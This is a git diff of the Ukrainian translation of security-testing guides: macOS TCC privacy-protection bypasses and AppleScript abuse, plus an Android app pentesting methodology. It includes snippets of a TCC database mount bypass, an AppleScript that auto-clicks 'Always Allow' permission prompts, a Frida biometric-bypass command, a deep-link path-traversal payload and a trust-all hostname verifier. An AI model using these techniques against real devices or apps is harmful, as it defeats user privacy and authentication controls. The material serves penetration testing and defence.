Єдине привілейоване, яке потрібно, це щоб застосунок (наприклад, `Terminal`) мав **Повний доступ до диска** (FDA) (`kTCCServiceSystemPolicyAllfiles`), що має бути надано адміністратором.
@ -441,9 +440,9 @@ ls /tmp/snap/Users/admin_user # This will work
```
Більш детальне пояснення можна [**знайти в оригінальному звіті**](https://theevilbit.github.io/posts/cve_2020_9771/)**.**
### CVE-2021-1784 & CVE-2021-30808 - Монтування файлу TCC
### CVE-2021-1784 & CVE-2021-30808 - Монтування через файл TCC
Навіть якщо файл бази даних TCC захищений, було можливим **замонтувати новий файл TCC.db** у директорії:
Навіть якщо файл бази даних TCC захищений, було можливим **монтувати новий файл TCC.db** через директорію:
```bash
# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
@ -476,7 +475,7 @@ os.system("hdiutil detach /tmp/mnt 1>/dev/null")
### asr
Інструмент **`/usr/sbin/asr`** дозволяв копіювати весь диск і монтувати його в іншому місці, обминаючи захисти TCC.
Інструмент **`/usr/sbin/asr`** дозволяв копіювати весь диск і монтувати його в іншому місці, обходячи захисти TCC.
### Служби геолокації
@ -509,7 +508,7 @@ os.system("hdiutil detach /tmp/mnt 1>/dev/null")
- [**https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8**](https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8)
- [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)
- [**20+ Ways to Bypass Your macOS Privacy Mechanisms**](https://www.youtube.com/watch?v=W9GxnP8c8FU)
- [**Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms**](https://www.youtube.com/watch?v=a9hsxPdRxsY)
- [**20+ способів обійти механізми конфіденційності macOS**](https://www.youtube.com/watch?v=W9GxnP8c8FU)
- [**Knockout Win Against TCC - 20+ НОВИХ способів обійти механізми конфіденційності MacOS**](https://www.youtube.com/watch?v=a9hsxPdRxsY)
{{#include ../../../../../banners/hacktricks-training.md}}

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
View File

@ -4,7 +4,7 @@
## Apple Scripts
Це мова сценаріїв, що використовується для автоматизації завдань **взаємодії з віддаленими процесами**. Це досить просто **запитати інші процеси виконати деякі дії**. **Шкідливе ПЗ** може зловживати цими функціями для зловживання функціями, експортованими іншими процесами.\
Це мова сценаріїв, що використовується для автоматизації завдань **взаємодіючи з віддаленими процесами**. Це досить просто **запитати інші процеси виконати деякі дії**. **Шкідливе ПЗ** може зловживати цими функціями для зловживання функціями, експортованими іншими процесами.\
Наприклад, шкідливе ПЗ може **впроваджувати довільний JS код у відкриті сторінки браузера**. Або **автоматично натискати** деякі дозволи, запитані у користувача;
```applescript
tell window 1 of process "SecurityAgent"
@ -12,7 +12,7 @@ click button "Always Allow" of group 1
end tell
```
Ось кілька прикладів: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
Знайдіть більше інформації про шкідливе ПЗ, використовуючи applescripts [**тут**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Знайдіть більше інформації про шкідливе ПЗ, використовуючи AppleScripts [**тут**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Apple скрипти можуть бути легко "**скомпільовані**". Ці версії можуть бути легко "**декомпільовані**" за допомогою `osadecompile`

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
View File

@ -713,7 +713,7 @@ screencapture -V 5 /tmp/screen.mov
- **Право**: Немає
- **TCC**: `kTCCServiceAccessibility`
Використовуйте привілей TCC, щоб прийняти контроль над Finder, натиснувши Enter, і обійти TCC таким чином
Використовуйте привілей TCC, щоб прийняти контроль над Finder, натискаючи Enter, і обійти TCC таким чином
{{#tabs}}
{{#tab name="Прийняти TCC"}}
@ -877,6 +877,6 @@ return 0;
{{#endtab}}
{{#endtabs}}
> [!CAUTION] > **Доступність є дуже потужним дозволом**, ви можете зловживати нею іншим чином, наприклад, ви можете виконати **атаку на натискання клавіш** лише з її допомогою, без необхідності викликати System Events.
> [!CAUTION] > **Доступність є дуже потужним дозволом**, ви можете зловживати нею іншим чином, наприклад, ви можете виконати **атаку на натискання клавіш** лише з її допомогою, не викликаючи System Events.
{{#include ../../../../banners/hacktricks-training.md}}

102
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -4,7 +4,7 @@
## Основи Android-додатків
Рекомендується почати читати цю сторінку, щоб дізнатися про **найважливіші частини, пов'язані з безпекою Android, та найнебезпечніші компоненти в Android-додатку**:
Рекомендується почати читати цю сторінку, щоб дізнатися про **найважливіші частини, пов'язані з безпекою Android та найнебезпечніші компоненти в Android-додатку**:
{{#ref}}
android-applications-basics.md
@ -12,15 +12,15 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
Це основний інструмент, який вам потрібен для підключення до android-пристрою (емульованого або фізичного).\
**ADB** дозволяє контролювати пристрої як через **USB**, так і через **мережу** з комп'ютера. Ця утиліта дозволяє **копіювати** файли в обох напрямках, **встановлювати** та **видаляти** додатки, **виконувати** команди оболонки, **робити резервні копії** даних, **читати** журнали та інші функції.
Це основний інструмент, який вам потрібен для підключення до Android-пристрою (емульованого або фізичного).\
**ADB** дозволяє контролювати пристрої через **USB** або **мережу** з комп'ютера. Ця утиліта дозволяє **копіювати** файли в обох напрямках, **встановлювати** та **видаляти** додатки, **виконувати** команди оболонки, **робити резервні копії** даних, **читати** журнали та інші функції.
Ознайомтеся з наступним списком [**команд ADB**](adb-commands.md), щоб дізнатися, як використовувати adb.
## Smali
Іноді цікаво **модифікувати код додатку**, щоб отримати доступ до **прихованої інформації** (можливо, добре обфусцированих паролів або флагів). Тоді може бути цікаво декомпілювати apk, модифікувати код і знову скомпілювати його.\
[**У цьому навчальному посібнику** ви можете **дізнатися, як декомпілювати APK, модифікувати код Smali та знову скомпілювати APK** з новою функціональністю](smali-changes.md). Це може бути дуже корисно як **альтернатива для кількох тестів під час динамічного аналізу**, які будуть представлені. Тому **завжди тримайте цю можливість в умі**.
Іноді цікаво **модифікувати код додатку**, щоб отримати доступ до **прихованої інформації** (можливо, добре обфусцировані паролі або прапори). Тоді може бути цікаво декомпілювати apk, модифікувати код і знову скомпілювати його.\
[**У цьому навчальному посібнику** ви можете **дізнатися, як декомпілювати APK, модифікувати код Smali та знову скомпілювати APK** з новою функціональністю](smali-changes.md). Це може бути дуже корисно як **альтернатива для кількох тестів під час динамічного аналізу**, які будуть представлені. Тому **завжди тримайте в умі цю можливість**.
## Інші цікаві трюки
@ -87,7 +87,7 @@ tapjacking.md
### Захоплення завдань
**Активність** з **`launchMode`**, встановленим на **`singleTask` без жодного `taskAffinity`**, вразлива до захоплення завдань. Це означає, що **програму** можна встановити, і якщо вона запуститься перед реальною програмою, вона може **захопити завдання реальної програми** (так що користувач буде взаємодіяти з **зловмисною програмою, вважаючи, що використовує реальну**).
**Активність** з **`launchMode`**, встановленим на **`singleTask` без визначеного `taskAffinity`**, вразлива до захоплення завдань. Це означає, що **програму** можна встановити, і якщо вона запуститься перед реальною програмою, вона може **захопити завдання реальної програми** (так що користувач буде взаємодіяти з **зловмисною програмою, вважаючи, що використовує реальну**).
Більше інформації в:
@ -99,12 +99,12 @@ android-task-hijacking.md
**Внутрішнє зберігання**
В Android файли, **збережені** у **внутрішньому** зберіганні, **призначені** для **доступу** виключно програмою, яка їх **створила**. Ця міра безпеки **забезпечується** операційною системою Android і зазвичай є адекватною для потреб безпеки більшості програм. Однак розробники іноді використовують режими, такі як `MODE_WORLD_READABLE` і `MODE_WORLD_WRITABLE`, щоб **дозволити** файлам **ділитися** між різними програмами. Проте ці режими **не обмежують доступ** до цих файлів з інших програм, включаючи потенційно зловмисні.
У Android файли, **збережені** у **внутрішньому** зберіганні, **призначені** для **доступу** виключно програмою, яка їх **створила**. Ця міра безпеки **забезпечується** операційною системою Android і зазвичай є адекватною для потреб безпеки більшості програм. Однак розробники іноді використовують режими, такі як `MODE_WORLD_READABLE` і `MODE_WORLD_WRITABLE`, щоб **дозволити** файлам **ділитися** між різними програмами. Проте ці режими **не обмежують доступ** до цих файлів з інших програм, включаючи потенційно зловмисні.
1. **Статичний аналіз:**
- **Переконайтеся**, що використання `MODE_WORLD_READABLE` і `MODE_WORLD_WRITABLE` **ретельно перевіряється**. Ці режими **можуть потенційно відкрити** файли для **небажаного або несанкціонованого доступу**.
2. **Динамічний аналіз:**
- **Перевірте** **дозволи**, встановлені на файлах, створених програмою. Зокрема, **перевірте**, чи є файли **встановленими на читання або запис по всьому світу**. Це може становити значний ризик для безпеки, оскільки це дозволить **будь-якій програмі**, встановленій на пристрої, незалежно від її походження чи наміру, **читати або змінювати** ці файли.
- **Перевірте** **дозволи**, встановлені на файли, створені програмою. Зокрема, **перевірте**, чи є файли **встановленими на читання або запис по всьому світу**. Це може становити значний ризик для безпеки, оскільки це дозволить **будь-якій програмі**, встановленій на пристрої, незалежно від її походження чи наміру, **читати або змінювати** ці файли.
**Зовнішнє зберігання**
@ -116,7 +116,7 @@ android-task-hijacking.md
- З огляду на легкість доступу, рекомендується **не зберігати чутливу інформацію** на зовнішньому зберіганні.
- Зовнішнє зберігання може бути видалено або доступно будь-якою програмою, що робить його менш безпечним.
3. **Обробка даних з зовнішнього зберігання**:
- Завжди **виконуйте перевірку введення** на дані, отримані з зовнішнього зберігання. Це важливо, оскільки дані надходять з ненадійного джерела.
- Завжди **виконуйте валідацію введення** на даних, отриманих з зовнішнього зберігання. Це важливо, оскільки дані надходять з ненадійного джерела.
- Зберігання виконуваних файлів або класів на зовнішньому зберіганні для динамічного завантаження категорично не рекомендується.
- Якщо ваша програма повинна отримувати виконувані файли з зовнішнього зберігання, переконайтеся, що ці файли **підписані та криптографічно перевірені** перед їх динамічним завантаженням. Цей крок є важливим для підтримки цілісності безпеки вашої програми.
@ -139,7 +139,7 @@ android-task-hijacking.md
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
Добрий спосіб протестувати це - спробувати захопити трафік, використовуючи проксі, як Burp, без авторизації Burp CA на пристрої. Також ви можете згенерувати з Burp сертифікат для іншого імені хоста та використовувати його.
Добрий спосіб протестувати це - спробувати захопити трафік, використовуючи проксі, як Burp, без авторизації CA Burp на пристрої. Також ви можете згенерувати з Burp сертифікат для іншого імені хоста та використовувати його.
### Пошкоджена криптографія
@ -153,8 +153,8 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
### Інші перевірки
- Рекомендується **обфускувати APK**, щоб ускладнити реверс-інженерні роботи для зловмисників.
- Якщо додаток є чутливим (як банківські додатки), він повинен виконувати **власні перевірки, щоб дізнатися, чи пристрій є рутованим**, і діяти відповідно.
- Рекомендується **обфускувати APK**, щоб ускладнити реверс-інженеринг для зловмисників.
- Якщо додаток є чутливим (як банківські додатки), він повинен виконувати **власні перевірки, щоб дізнатися, чи мобільний пристрій є рутованим**, і діяти відповідно.
- Якщо додаток є чутливим (як банківські додатки), він повинен перевіряти, чи використовується **емулятор**.
- Якщо додаток є чутливим (як банківські додатки), він повинен **перевіряти свою цілісність перед виконанням**, щоб перевірити, чи був він змінений.
- Використовуйте [**APKiD**](https://github.com/rednaga/APKiD), щоб перевірити, який компілятор/упаковщик/обфускатор був використаний для створення APK.
@ -187,7 +187,7 @@ react-native-application.md
### Витік секретів
Додаток може містити секрети (API ключі, паролі, приховані URL, піддомени...) всередині нього, які ви можете виявити. Ви можете використовувати інструмент, такий як [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks).
Додаток може містити секрети (API ключі, паролі, приховані URL-адреси, піддомени...) всередині нього, які ви можете виявити. Ви можете використовувати інструмент, такий як [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks).
### Обхід біометричної аутентифікації
@ -214,7 +214,7 @@ content-protocol.md
## Динамічний аналіз
> По-перше, вам потрібне середовище, де ви можете встановити додаток і все середовище (сертифікат Burp CA, Drozer і Frida в основному). Тому рутований пристрій (емулятор чи ні) є надзвичайно рекомендованим.
> По-перше, вам потрібне середовище, де ви можете встановити додаток і все середовище (сертифікат CA Burp, Drozer і Frida в основному). Тому рутований пристрій (емулятор чи ні) є надзвичайно рекомендованим.
### Онлайн динамічний аналіз
@ -230,7 +230,7 @@ content-protocol.md
#### Використання емулятора
- [**Android Studio**](https://developer.android.com/studio) (Ви можете створювати **x86** та **arm** пристрої, і відповідно до [**цього**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**останніх x86** версій **підтримують ARM бібліотеки** без необхідності в повільному емуляторі arm).
- [**Android Studio**](https://developer.android.com/studio) (Ви можете створювати **x86** та **arm** пристрої, і відповідно до [**цього**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**останні версії x86** підтримують ARM бібліотеки без необхідності в повільному емуляторі arm).
- Дізнайтеся, як налаштувати його на цій сторінці:
{{#ref}}
@ -260,25 +260,25 @@ avd-android-virtual-device.md
5. Поверніться назад, і ви знайдете **Опції розробника**.
> Після встановлення програми перше, що ви повинні зробити, це спробувати її та дослідити, що вона робить, як вона працює і звикнути до неї.\
> Я рекомендую **виконати цей початковий динамічний аналіз, використовуючи динамічний аналіз MobSF + pidcat**, щоб ми могли **вивчити, як працює програма**, поки MobSF **збирає** багато **цікавих** **даних**, які ви зможете переглянути пізніше.
> Я рекомендую **виконати цей початковий динамічний аналіз, використовуючи динамічний аналіз MobSF + pidcat**, щоб ми могли **дослідити, як працює програма**, поки MobSF **збирає** багато **цікавих** **даних**, які ви зможете переглянути пізніше.
### Ненавмисний витік даних
**Логування**
**Журналювання**
Розробники повинні бути обережними, щоб не розкривати **інформацію для налагодження** публічно, оскільки це може призвести до витоку чутливих даних. Рекомендуються інструменти [**pidcat**](https://github.com/JakeWharton/pidcat) та `adb logcat` для моніторингу журналів програми, щоб виявити та захистити чутливу інформацію. **Pidcat** віддається перевага за його простоту використання та читабельність.
Розробники повинні бути обережними, щоб не оприлюднювати **інформацію для налагодження**, оскільки це може призвести до витоку чутливих даних. Рекомендуються інструменти [**pidcat**](https://github.com/JakeWharton/pidcat) та `adb logcat` для моніторингу журналів програми, щоб виявити та захистити чутливу інформацію. **Pidcat** віддається перевага за його простоту використання та читабельність.
> [!WARNING]
> Зверніть увагу, що з **пізніми версіями, ніж Android 4.0**, **додатки можуть отримувати доступ лише до своїх власних журналів**. Тому додатки не можуть отримувати доступ до журналів інших додатків.\
> Тим не менш, все ще рекомендується **не записувати чутливу інформацію**.
> Тим не менш, все ще рекомендується **не реєструвати чутливу інформацію**.
**Кешування буфера копіювання/вставки**
**Кліпборд** Android дозволяє функціональність копіювання-вставки в додатках, але це створює ризик, оскільки **інші додатки** можуть **отримати доступ** до буфера обміну, потенційно розкриваючи чутливі дані. Важливо **відключити функції копіювання/вставки** для чутливих частин програми, таких як дані кредитних карток, щоб запобігти витоку даних.
Фреймворк **на основі буфера обміну** Android дозволяє функціональність копіювання-вставки в додатках, але несе ризик, оскільки **інші додатки** можуть **отримати доступ** до буфера обміну, потенційно розкриваючи чутливі дані. Важливо **відключити функції копіювання/вставки** для чутливих розділів програми, таких як дані кредитних карток, щоб запобігти витоку даних.
**Журнали аварій**
Якщо програма **зависає** і **зберігає журнали**, ці журнали можуть допомогти зловмисникам, особливо коли програму не можна реверсувати. Щоб зменшити цей ризик, уникайте ведення журналів при аваріях, а якщо журнали повинні передаватися через мережу, переконайтеся, що вони надсилаються через SSL-канал для безпеки.
Якщо додаток **виникає аварія** і **зберігає журнали**, ці журнали можуть допомогти зловмисникам, особливо коли додаток не може бути реверсовано. Щоб зменшити цей ризик, уникайте ведення журналів при аваріях, і якщо журнали повинні передаватися через мережу, переконайтеся, що вони надсилаються через SSL-канал для безпеки.
Як пентестер, **слідкуйте за цими журналами**.
@ -286,18 +286,18 @@ avd-android-virtual-device.md
Додатки часто інтегрують сервіси, такі як Google Adsense, які можуть ненавмисно **викривати чутливі дані** через неналежну реалізацію розробниками. Щоб виявити потенційні витоки даних, рекомендується **перехопити трафік програми** та перевірити, чи надсилається якась чутлива інформація третім особам.
### SQLite DBs
### SQLite БД
Більшість додатків використовуватимуть **внутрішні SQLite бази даних** для збереження інформації. Під час пентесту зверніть увагу на **бази даних**, які були створені, назви **таблиць** та **стовпців** і всі **дані**, які зберігаються, оскільки ви можете знайти **чутливу інформацію** (що буде вразливістю).\
Більшість додатків використовуватимуть **внутрішні SQLite бази даних** для збереження інформації. Під час пентесту зверніть увагу на **бази даних**, що створюються, назви **таблиць** та **стовпців** і всі **дані**, що зберігаються, оскільки ви можете знайти **чутливу інформацію** (що буде вразливістю).\
Бази даних повинні розташовуватися в `/data/data/the.package.name/databases`, як `/data/data/com.mwr.example.sieve/databases`.
Якщо база даних зберігає конфіденційну інформацію і є **зашифрованою**, але ви можете **знайти** **пароль** всередині програми, це все ще є **вразливістю**.
Якщо база даних зберігає конфіденційну інформацію і **зашифрована**, але ви можете **знайти** **пароль** всередині програми, це все ще є **вразливістю**.
Перерахуйте таблиці, використовуючи `.tables`, і перераховуйте стовпці таблиць, виконуючи `.schema <table_name>`.
### Drozer (Експлуатація активностей, постачальників контенту та сервісів)
З [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** дозволяє вам **приймати роль Android-додатка** та взаємодіяти з іншими додатками. Він може робити **все, що може зробити встановлений додаток**, наприклад, використовувати механізм міжпроцесного зв'язку (IPC) Android і взаємодіяти з основною операційною системою.\
З [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** дозволяє вам **приймати роль Android-додатка** та взаємодіяти з іншими додатками. Він може робити **все, що може зробити встановлений додаток**, наприклад, використовувати механізм міжпроцесного спілкування (IPC) Android і взаємодіяти з основною операційною системою.\
Drozer є корисним інструментом для **експлуатації експортованих активностей, експортованих сервісів та постачальників контенту**, як ви дізнаєтеся в наступних розділах.
### Експлуатація експортованих активностей
@ -307,7 +307,7 @@ Drozer є корисним інструментом для **експлуата
**Обхід авторизації**
Коли активність експортується, ви можете викликати її екран з зовнішнього додатка. Тому, якщо активність з **чутливою інформацією** є **експортованою**, ви можете **обійти** механізми **автентифікації**, щоб отримати до неї доступ.
Коли активність експортується, ви можете викликати її екран з зовнішнього додатка. Тому, якщо активність з **чутливою інформацією** є **експортованою**, ви можете **обійти** механізми **авторизації**, щоб отримати до неї доступ.
[**Дізнайтеся, як експлуатувати експортовані активності за допомогою Drozer.**](drozer-tutorial/#activities)
@ -318,7 +318,7 @@ Drozer є корисним інструментом для **експлуата
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**ЗАУВАЖЕННЯ**: MobSF виявить використання _**singleTask/singleInstance**_ як `android:launchMode` в активності як шкідливе, але через [це](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), очевидно, це небезпечно лише на старих версіях (версії API < 21).
**ЗАУВАЖЕННЯ**: MobSF виявить використання _**singleTask/singleInstance**_ як `android:launchMode` в активності як шкідливе, але через [це](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750) це, очевидно, небезпечно лише на старих версіях (версії API < 21).
> [!NOTE]
> Зверніть увагу, що обхід авторизації не завжди є вразливістю, це залежить від того, як працює обхід і яка інформація піддається розкриттю.
@ -331,7 +331,7 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
Якщо tapjacking не запобігається, ви можете зловживати експортованою активністю, щоб змусити **користувача виконувати неочікувані дії**. Для отримання додаткової інформації про [**що таке Tapjacking, перейдіть за посиланням**](./#tapjacking).
### Експлуатація постачальників контенту - Доступ до чутливої інформації та її маніпуляція
### Експлуатація постачальників контенту - доступ до чутливої інформації та її маніпуляція
[**Прочитайте це, якщо хочете освіжити знання про постачальника контенту.**](android-applications-basics.md#content-provider)\
Постачальники контенту в основному використовуються для **обміну даними**. Якщо у програми є доступні постачальники контенту, ви можете **витягнути чутливі** дані з них. Також цікаво протестувати можливі **SQL-ін'єкції** та **перетворення шляхів**, оскільки вони можуть бути вразливими.
@ -354,7 +354,7 @@ adb shell am start -n com.example.demo/com.example.test.MainActivity
Приймач трансляцій буде чекати на певний тип повідомлення. В залежності від того, як приймач обробляє повідомлення, він може бути вразливим.\
[**Дізнайтеся, як експлуатувати приймачі трансляцій за допомогою Drozer.**](./#exploiting-broadcast-receivers)
### **Експлуатація схем / Глибоких посилань**
### **Експлуатація схем / глибоких посилань**
Ви можете шукати глибокі посилання вручну, використовуючи інструменти, такі як MobSF, або скрипти, такі як [цей](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Ви можете **відкрити** оголошену **схему** за допомогою **adb** або **браузера**:
@ -376,21 +376,21 @@ _Зверніть увагу, що ви можете **пропустити ім
**Чутлива інформація**
Кожного разу, коли ви знаходите глибоке посилання, перевірте, що **воно не отримує чутливі дані (як-от паролі) через URL параметри**, оскільки будь-який інший додаток може **видавати себе за глибоке посилання і вкрасти ці дані!**
Кожного разу, коли ви знаходите глибоке посилання, перевірте, що **воно не отримує чутливі дані (наприклад, паролі) через параметри URL**, оскільки будь-який інший додаток може **видавати себе за глибоке посилання і вкрасти ці дані!**
**Параметри в шляху**
Ви **також повинні перевірити, чи використовує будь-яке глибоке посилання параметр всередині шляху** URL, наприклад: `https://api.example.com/v1/users/{username}`, у такому випадку ви можете примусити перехід по шляху, отримуючи доступ до чогось на кшталт: `example://app/users?username=../../unwanted-endpoint%3fparam=value`.\
Зверніть увагу, що якщо ви знайдете правильні кінцеві точки всередині додатку, ви можете викликати **Open Redirect** (якщо частина шляху використовується як ім'я домену), **захоплення облікового запису** (якщо ви можете змінити деталі користувачів без CSRF токена, а вразлива кінцева точка використовувала правильний метод) та будь-яку іншу вразливість. Більше [інформації про це тут](http://dphoeniixx.com/2020/12/13-2/).
Ви **також повинні перевірити, чи використовує будь-яке глибоке посилання параметр всередині шляху** URL, наприклад: `https://api.example.com/v1/users/{username}`, у цьому випадку ви можете примусити перехід по шляху, отримуючи доступ до чогось на кшталт: `example://app/users?username=../../unwanted-endpoint%3fparam=value`.\
Зверніть увагу, що якщо ви знайдете правильні кінцеві точки всередині програми, ви можете викликати **Open Redirect** (якщо частина шляху використовується як ім'я домену), **захоплення облікового запису** (якщо ви можете змінити деталі користувачів без CSRF токена, а вразлива кінцева точка використовувала правильний метод) та будь-яку іншу вразливість. Більше [інформації про це тут](http://dphoeniixx.com/2020/12/13-2/).
**Більше прикладів**
Цікава [відповідь на баг-баунті](https://hackerone.com/reports/855618) про посилання (_/.well-known/assetlinks.json_).
### Перевірка та верифікація транспортного рівня
### Перевірка та верифікація транспортного шару
- **Сертифікати не завжди перевіряються належним чином** Android-додатками. Це звичайна практика, коли ці додатки ігнорують попередження і приймають самопідписані сертифікати або, в деяких випадках, повертаються до використання HTTP-з'єднань.
- **Переговори під час SSL/TLS рукопожаття іноді є слабкими**, використовуючи небезпечні шифри. Ця вразливість робить з'єднання вразливим до атак типу man-in-the-middle (MITM), що дозволяє зловмисникам розшифровувати дані.
- **Сертифікати не завжди належним чином перевіряються** Android-додатками. Це звичайна практика для цих додатків ігнорувати попередження та приймати самопідписані сертифікати або, в деяких випадках, повертатися до використання HTTP-з'єднань.
- **Переговори під час SSL/TLS рукопожаття іноді є слабкими**, використовуючи небезпечні шифри. Ця вразливість робить з'єднання вразливим до атак "людина посередині" (MITM), що дозволяє зловмисникам розшифровувати дані.
- **Витік приватної інформації** є ризиком, коли додатки аутентифікуються за допомогою захищених каналів, але потім спілкуються через незахищені канали для інших транзакцій. Цей підхід не захищає чутливі дані, такі як сесійні куки або деталі користувачів, від перехоплення зловмисними особами.
#### Перевірка сертифікатів
@ -424,10 +424,10 @@ SSL Pinning - це захід безпеки, коли додаток перев
### Frida
[Frida](https://www.frida.re) - це набір інструментів для динамічної інструментації для розробників, реверс-інженерів та дослідників безпеки.\
**Ви можете отримати доступ до запущеного додатку та підключати методи в реальному часі, щоб змінити поведінку, змінити значення, витягти значення, виконати різний код...**\
**Ви можете отримати доступ до працюючого додатку та підключати методи в реальному часі, щоб змінити поведінку, змінити значення, витягти значення, виконати різний код...**\
Якщо ви хочете провести тестування безпеки Android-додатків, вам потрібно знати, як використовувати Frida.
- Дізнайтеся, як використовувати Frida: [**посібник з Frida**](frida-tutorial/)
- Дізнайтеся, як використовувати Frida: [**посібник Frida**](frida-tutorial/)
- Деякі "GUI" для дій з Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection чудово підходить для автоматизації використання Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- Ви можете знайти деякі чудові скрипти Frida тут: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
@ -468,7 +468,7 @@ frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app
```
### **Фонові зображення**
Коли ви ставите додаток у фоновий режим, Android зберігає **знімок додатку**, щоб, коли його відновлюють на передній план, він починає завантажувати зображення перед додатком, тому здається, що додаток завантажився швидше.
Коли ви ставите додаток у фоновий режим, Android зберігає **знімок додатка**, щоб, коли його відновлюють на передній план, він починає завантажувати зображення перед додатком, тому здається, що додаток завантажився швидше.
Однак, якщо цей знімок містить **чутливу інформацію**, хтось, хто має доступ до знімка, може **викрасти цю інформацію** (зверніть увагу, що вам потрібен root для доступу до неї).
@ -497,10 +497,10 @@ getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
### Ін'єкції на стороні клієнта Android та інші
Можливо, ви знаєте про цей вид вразливостей з вебу. Вам потрібно бути особливо обережними з цими вразливостями в Android-додатку:
Напевно, ви знаєте про цей вид вразливостей з вебу. Вам потрібно бути особливо обережними з цими вразливостями в Android-додатку:
- **SQL-ін'єкція:** При роботі з динамічними запитами або постачальниками контенту переконайтеся, що ви використовуєте параметризовані запити.
- **Ін'єкція JavaScript (XSS):** Переконайтеся, що підтримка JavaScript та плагінів вимкнена для будь-яких WebViews (вимкнено за замовчуванням). [Більше інформації тут](webview-attacks.md#javascript-enabled).
- **Ін'єкція JavaScript (XSS):** Перевірте, що підтримка JavaScript та плагінів вимкнена для будь-яких WebViews (вимкнено за замовчуванням). [Більше інформації тут](webview-attacks.md#javascript-enabled).
- **Включення локальних файлів:** WebViews повинні мати доступ до файлової системи вимкненим (включено за замовчуванням) - `(webview.getSettings().setAllowFileAccess(false);)`. [Більше інформації тут](webview-attacks.md#javascript-enabled).
- **Вічні куки**: У кількох випадках, коли Android-додаток завершує сесію, куки не відкликаються або можуть бути навіть збережені на диску.
- [**Безпечний прапорець** у куках](../../pentesting-web/hacking-with-cookies/#cookies-flags)
@ -521,16 +521,16 @@ docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
Зверніть увагу, що MobSF може аналізувати **Android**(apk)**, IOS**(ipa) **та Windows**(apx) програми (_Windows програми повинні аналізуватися з MobSF, встановленого на Windows хості_).\
Також, якщо ви створите **ZIP** файл з вихідним кодом **Android** або **IOS** програми (перейдіть до кореневої папки програми, виберіть все і створіть ZIP файл), він також зможе його проаналізувати.
Також, якщо ви створите **ZIP** файл з вихідним кодом **Android** або **IOS** програми (перейдіть до кореневої папки програми, виберіть все і створіть ZIP-файл), він також зможе його проаналізувати.
MobSF також дозволяє вам **diff/Compare** аналіз і інтегрувати **VirusTotal** (вам потрібно буде налаштувати свій API ключ у _MobSF/settings.py_ і активувати його: `VT_ENABLED = TRUE` `VT_API_KEY = <Ваш API ключ>` `VT_UPLOAD = TRUE`). Ви також можете встановити `VT_UPLOAD` на `False`, тоді **hash** буде **завантажений** замість файлу.
MobSF також дозволяє вам **diff/Compare** аналіз і інтегрувати **VirusTotal** (вам потрібно буде налаштувати свій API ключ у _MobSF/settings.py_ і активувати його: `VT_ENABLED = TRUE` `VT_API_KEY = <Ваш API ключ>` `VT_UPLOAD = TRUE`). Ви також можете встановити `VT_UPLOAD` на `False`, тоді **хеш** буде **завантажений** замість файлу.
### Допоміжний динамічний аналіз з MobSF
**MobSF** також може бути дуже корисним для **динамічного аналізу** в **Android**, але в цьому випадку вам потрібно буде встановити MobSF і **genymotion** на вашому хості (VM або Docker не працюватимуть). римітка: Вам потрібно **спочатку запустити VM в genymotion** і **потім MobSF.**_\
**MobSF динамічний аналізатор** може:
- **Вивантажити дані програми** (URL, журнали, буфер обміну, скріншоти, зроблені вами, скріншоти, зроблені "**Exported Activity Tester**", електронні листи, бази даних SQLite, XML файли та інші створені файли). Усе це виконується автоматично, за винятком скріншотів, вам потрібно натиснути, коли ви хочете зробити скріншот, або вам потрібно натиснути "**Exported Activity Tester**", щоб отримати скріншоти всіх експортованих активностей.
- **Вивантажити дані програми** (URL-адреси, журнали, буфер обміну, скріншоти, зроблені вами, скріншоти, зроблені "**Exported Activity Tester**", електронні листи, бази даних SQLite, XML файли та інші створені файли). Усе це виконується автоматично, за винятком скріншотів, вам потрібно натиснути, коли ви хочете зробити скріншот, або вам потрібно натиснути "**Exported Activity Tester**", щоб отримати скріншоти всіх експортованих активностей.
